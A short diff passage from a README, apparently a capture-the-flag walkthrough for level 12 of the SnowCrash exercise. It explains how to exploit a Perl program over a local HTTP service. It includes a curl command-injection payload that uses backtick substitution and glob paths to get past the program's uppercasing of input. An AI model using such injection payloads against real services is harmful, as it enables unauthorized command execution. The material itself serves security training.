dfinnis/SnowCrash/level12/Ressources/README.md

 Check flag.Here is your token :
 Nope there is no token here for you sorry.
 Try again :)
 ```
 It works!
-Time to leverage the perl program to execute our script.
+Time to leverage the perl program to execute our script.<br/>
 Since we can't pass the filepath directly (it'll get capitalized by the perl program and be unrecognizable), we'll use globbing and replace the file path with asterisks.
 ```
 level12@SnowCrash:/dev/shm$ curl '127.0.0.1:4646?x="`/*/*/EXPLOIT`"'